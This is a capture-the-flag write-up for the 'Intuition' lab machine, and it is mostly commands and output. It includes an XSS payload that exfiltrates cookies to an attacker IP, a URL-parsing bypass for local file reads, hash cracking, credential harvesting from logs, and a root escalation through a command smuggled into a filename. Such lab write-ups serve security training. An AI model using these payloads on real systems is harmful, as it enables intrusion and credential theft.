HTB - Intuition [Hard]
TCP Scan
> TARGET=10.129.54.182 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://comprezzor.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
- add domain
echo '10.129.54.182 comprezzor.htb' >> /etc/hosts
web enum
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://comprezzor.htb/" -H "Host: FUZZ.comprezzor.htb" --hl 107
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
000000291: 302 5 L 22 W 199 Ch "auth"
000000485: 200 108 L 299 W 3166 Ch "report"
000000516: 302 5 L 22 W 251 Ch "dashboard"
auth.comprezzor.htb report.comprezzor.htb dashboard.comprezzor.htb
report.comprezzor.htb
- browse to
report.comprezzor.htb
there is a report_bug functionality - register an account and login to use the report bug functionality
- send a bug report with the following payload and setup a listener to check the returned call
# <img src=x onerror=fetch("http://10.10.14.121/?test2="+document.cookie)>
report_title=test&description=%3Cimg+src%3Dx+onerror%3Dfetch%28%22http%3A%2F%2F10.10.14.121%2F%3Ftest2%3D%22%2Bdocument.cookie%29%3E
10.129.54.182 - - [28/Apr/2024 18:42:32] "GET /test?user_data=eyJ1c2VyX2lkIjogMiwgInVzZXJuYW1lIjogImFkYW0iLCAicm9sZSI6ICJ3ZWJkZXYifXw1OGY2ZjcyNTMzOWNlM2Y2OWQ4NTUyYTEwNjk2ZGRlYmI2OGIyYjU3ZDJlNTIzYzA4YmRlODY4ZDNhNzU2ZGI4 HTTP/1.1"
- browse to dashboard.comprezzor.htb
- this is the cookie of the admin, base64 decode it
{"user_id": 2, "username": "adam", "role": "webdev"}|58f6f725339ce3f69d8552a10696ddebb68b2b57d2e523c08bde868d3a756db8
- browse to the submited ticket and set priority to high, then admin will read the ticket
eyJ1c2VyX2lkIjogMSwgInVzZXJuYW1lIjogImFkbWluIiwgInJvbGUiOiAiYWRtaW4ifXwzNDgyMjMzM2Q0NDRhZTBlNDAyMmY2Y2M2NzlhYzlkMjZkMWQxZDY4MmM1OWM2MWNmYmVhMjlkNzc2ZDU4OWQ5
- setup a listener to get the admin’s cookie and locate a link to http://dashboard.comprezzor.htb/create_pdf_report
- create a request and setup a listener, this request makes the target query a url and generate a pdf report
curl -H "cookie: user_data=cookie" http://dashboard.comprezzor.htb/create_pdf_report -d "report_url=http://10.10.14.121:8888/" -o-
found wkhtmltopdf 0.12.6 in the pdf report
- setting up a listener and check the headers, found Python-urllib/3.11, which is vulnerable to CVE-2023-24329
- checkout this post: https://vsociety.medium.com/cve-2023-24329-bypassing-url-blackslisting-using-blank-in-python-urllib-library-ee438679351d
python3 ../pserver.py 8888
INFO:root:Starting httpd...
INFO:root:GET request,
Path: /index.html
Headers:
Accept-Encoding: identity
Host: 10.10.14.121:8888
User-Agent: Python-urllib/3.11
Cookie: user_data=cookie
Connection: close
- so, simply inserting a space before a payload like
file:///etc/passwd
will bypass the check and achieve arbitrary file read
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-
data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List
Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting
System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network
Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd
Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:104::/nonexistent:/usr/sbin/nologin systemd-
timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin avahi:x:105:110:Avahi mDNS
daemon,,,:/run/avahi-daemon:/usr/sbin/nologin geoclue:x:106:111::/var/lib/geoclue:/usr/sbin/nologin
# file:///proc/self/cmdline
python3/app/code/app.py
# file:///app/code/app.py
from flask import Flask, request, redirect
from blueprints.index.index import main_bp
from blueprints.report.report import report_bp
from blueprints.auth.auth import auth_bp
from blueprints.dashboard.dashboard import dashboard_bp
app = Flask(__name__) app.secret_key = "7ASS7ADA8RF3FD7" app.config['SERVER_NAME'] = 'comprezzor.htb'
app.config['MAX_CONTENT_LENGTH'] = 5 * 1024 * 1024 # Limit file size to 5MB ALLOWED_EXTENSIONS = {'txt',
'pdf', 'docx'} # Add more allowed file extensions if needed app.register_blueprint(main_bp)
app.register_blueprint(report_bp, subdomain='report') app.register_blueprint(auth_bp, subdomain='auth')
app.register_blueprint(dashboard_bp, subdomain='dashboard') if __name__ == '__main__': app.run(debug=False,
host="0.0.0.0", port=80)
# file:///app/code/blueprints/dashboard/dashboard.py
ftp = FTP('ftp.local') ftp.login(user='ftp_admin', passwd='u3jai8y71s2') ftp.cwd('/')
# file:///app/code/blueprints/auth/auth_utils.py
there is a sqlite3 db called users.db
ftp.local
- use the same create_pdf_report url and connect to ftp
# ftp://ftp_admin:u3jai8y71s2@ftp.local
-rw------- 1 root root 2655 Apr 29 01:45 private-8297.key -rw-r--r-- 1 root root 15519 Apr 29 01:45 welcome_note.pdf -rw-
r--r-- 1 root root 1732 Apr 29 01:45 welcome_note.txt
# ftp://ftp_admin:u3jai8y71s2@ftp.local/private-8297.key
get the private key
# ftp://ftp_admin:u3jai8y71s2@ftp.local/welcome_note.txt
Dear Devs, We are thrilled to extend a warm welcome to you as you embark on this exciting journey with us. Your
arrival marks the beginning of an inspiring chapter in our collective pursuit of excellence, and we are genuinely
delighted to have you on board. Here, we value talent, innovation, and teamwork, and your presence here reaffirms our
commitment to nurturing a diverse and dynamic workforce. Your skills, experience, and unique perspectives are
invaluable assets that will contribute significantly to our continued growth and success. As you settle into your new
role, please know that you have our unwavering support. Our team is here to guide and assist you every step of the way,
ensuring that you have the resources and knowledge necessary to thrive in your position. To facilitate your work and
access to our systems, we have attached an SSH private key to this email. You can use the following passphrase to
access it, `Y27SH19HDIWD`. Please ensure the utmost confidentiality and security when using this key. If you have any
questions or require assistance with server access or any other aspect of your work, please do not hesitate to reach out
for assistance. In addition to your technical skills, we encourage you to bring your passion, creativity, and innovative
thinking to the table. Your contributions will play a vital role in shaping the future of our projects and products. Once
again, welcome to your new family. We look forward to getting to know you, collaborating with you, and witnessing
your exceptional contributions. Together, we will continue to achieve great things. If you have any questions or need
further information, please feel free to me at adam@comprezzor.htb. Best regards, Adam
- geneate the id_rsa file from the above private key
> ssh-keygen -p -N "" -m pem -f private-8297.key
Enter old passphrase:
Key has comment 'dev_acc@local'
Your identification has been saved with the new passphrase.
- access the target to get user flag
ssh -i private-8297.key dev_acc@comprezzor.htb
dev_acc@intuition:~$ ls
user.txt
dev_acc@intuition:~$ cat user.txt
13c44b4b6263a2fbc5ed139142834394
dev_acc@intuition:~$
pe
- search for the previously found users.db file
dev_acc@intuition:~$ find / -type f -name users.db 2>/dev/null
/var/www/app/blueprints/auth/users.db
- download to local and crack the hashes in it
sha256$nypGJ02XBnkIQK71$f0e11dc8ad21242b550cc8a3c27baaf1022b6522afaadbfa92bd612513e9b606
sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43
> hashcat.exe -m 30120 hash.txt rockyou.txt
sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43:adam gray
- login to ftp as
adam
dev_acc@intuition:~$ ftp localhost
Connected to localhost.
220 pyftpdlib 1.5.7 ready.
Name (localhost:dev_acc): adam
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||39073|).
125 Data connection already open. Transfer starting.
drwxr-xr-x 3 root 1002 4096 Apr 10 08:21 backup
226 Transfer complete.
ftp> cd backup
250 "/backup" is the current directory.
ftp> ls
229 Entering extended passive mode (|||32967|).
150 File status okay. About to open data connection.
drwxr-xr-x 2 root 1002 4096 Apr 10 08:21 runner1
226 Transfer complete.
ftp> cd runner1
250 "/backup/runner1" is the current directory.
ftp> ls
229 Entering extended passive mode (|||39347|).
150 File status okay. About to open data connection.
-rwxr-xr-x 1 root 1002 318 Apr 06 00:25 run-tests.sh
-rwxr-xr-x 1 root 1002 16744 Oct 19 2023 runner1
-rw-r--r-- 1 root 1002 3815 Oct 19 2023 runner1.c
226 Transfer complete.
ftp> get run-tests.sh
ftp> get runner1.c
ftp> get runner1
- files
#!/bin/bash
# List playbooks
./runner1 list
# Run playbooks [Need authentication]
# ./runner run [playbook number] -a [auth code]
#./runner1 run 1 -a "UHI75GHI****"
# Install roles [Need authentication]
# ./runner install [role url] -a [auth code]
#./runner1 install http://role.host.tld/role.tar -a "UHI75GHI****"
- from runner1.c:13,24
#define AUTH_KEY_HASH "0feda17076d793c2ef2870d7427ad4ed"
...
if (strcmp(md5_str, AUTH_KEY_HASH) == 0) {
- crack the hash
> hashcat.exe hash.txt -a 3 -m 0 -1 ?l?u?d?s UHI75GHI?1?1?1?1
0feda17076d793c2ef2870d7427ad4ed:UHI75GHINKOP
./runner1 install http://role.host.tld/role.tar -a "UHI75GHINKOP"
- local enum
2024/04/29 02:50:20 CMD: UID=0 PID=2013 | python3 /ftp/server.py
2024/04/29 02:50:20 CMD: UID=1200 PID=1916 | python3 -m websockify --web /opt/bin/noVNC 7900 localhost:5900
2024/04/29 04:00:01 CMD: UID=0 PID=88146 | /bin/sh /root/scripts/cleanup/cleanup.sh
2024/04/29 04:00:01 CMD: UID=0 PID=88148 | /usr/bin/cp -r /root/scripts/cleanup/ftp_admin/private-8297.key /root/scripts/cleanup/ftp_admin/welcome_note.pdf /root/scripts/cleanup/ftp_admin/welcome_note.txt /opt/ftp/ftp_admin/
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:21 0.0.0.0:* LISTEN -
tcp 0 0 172.21.0.1:21 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:4444 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33791 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Found lib_mysqludf_sys.so:
If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');
- in the admin dashboard, there is a feature for backup, create a backup and quickly login to ftp as
ftp_admin
then get the back up file before it’s deleted
ftp> ls
229 Entering extended passive mode (|||46617|).
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 53224 Apr 29 03:40 app_backup_20240429034044.zip
-rw------- 1 root root 2655 Apr 29 03:40 private-8297.key
-rw-r--r-- 1 root root 15519 Apr 29 03:40 welcome_note.pdf
-rw-r--r-- 1 root root 1732 Apr 29 03:40 welcome_note.txt
226 Transfer complete.
ftp> get app_backup_20240429034044.zip
local: app_backup_20240429034044.zip remote: app_backup_20240429034044.zip
dev_acc@intuition:~$ find / -type f -user lopez 2>/dev/null
/etc/ansible/roles/kavi.tar/meta/main.yml
/usr/share/ansible/roles/kavi.tar/meta/main.yml
- check recently changed files
find / -type f -newermt '2024-04-01' -not -path "/usr/*" -not -path "/sys/*" -not -path "/proc/*" -not -path "/run/*" -not -path "/boot/*" -not -path "/var/lib/*" -ls 2>/dev/null
- check log files
dev_acc@intuition:~$ zgrep -i lopez /var/log/suricata/*.gz
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:43:36.099184+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:43:52.999165+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"PASS","command_data":"Lopezzz1992%123","completion_code":["530"],"reply":["Authentication failed."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:44:32.133372+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:44:48.188361+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"PASS","command_data":"Lopezz1992%123","completion_code":["230"],"reply":["Login successful."],"reply_received":"yes"}}
ftp_admin:u3jai8y71s2 lopez:Lopezz1992%123
- check sudo
lopez@intuition:~$ sudo -l
[sudo] password for lopez:
Matching Defaults entries for lopez on intuition:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User lopez may run the following commands on intuition:
(ALL : ALL) /opt/runner2/runner2
- enum
/opt/playbooks/inventory.ini
[local]
127.0.0.1
127.0.0.1 ansible_ssh_user=root ansible_ssh_private_key_file=/root/keys/private.key
[docker_web_servers]
172.21.0.2
/opt/playbooks/apt_update.yml
---
- name: Update and Upgrade APT Packages test
hosts: local
become: yes
tasks:
- name: Update APT Cache
apt:
update_cache: yes
when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'
- name: Upgrade APT Packages
apt:
upgrade: dist
update_cache: yes
when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'
- refer to https://github.com/coopdevs/sys-admins-role for an example tar.gz file
- create a json file
{"run":{"action":"install","role_file":"exploit.tar.gz;bash"},"auth_code":"UHI75GHINKOP"}
- get the tar.gz and the json
lopez@intuition:~$ wget http://10.10.14.121/exploit.json -O exploit.json && wget http://10.10.14.121/exploit.tar.gz -O 'exploit.tar.gz;bash' && sudo /opt/runner2/runner2 exploit.json
--2024-04-29 10:15:40-- http://10.10.14.121/exploit.json
Connecting to 10.10.14.121:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 89 [application/json]
Saving to: ‘exploit.json’
exploit.json 100%[====================================================================================>] 89 --.-KB/s in 0s
2024-04-29 10:15:40 (7.00 MB/s) - ‘exploit.json’ saved [89/89]
--2024-04-29 10:15:40-- http://10.10.14.121/exploit.tar.gz
Connecting to 10.10.14.121:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13787 (13K) [application/gzip]
Saving to: ‘exploit.tar.gz;bash’
exploit.tar.gz;bash 100%[====================================================================================>] 13.46K 58.7KB/s in 0.2s
2024-04-29 10:15:41 (58.7 KB/s) - ‘exploit.tar.gz;bash’ saved [13787/13787]
Starting galaxy role install process
- exploit.tar.gz is already installed, skipping.
root@intuition:/home/lopez# id
uid=0(root) gid=0(root) groups=0(root)
root@intuition:/home/lopez# cat /root/root.txt
3de0191f22527e88604dac5007d232a0
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack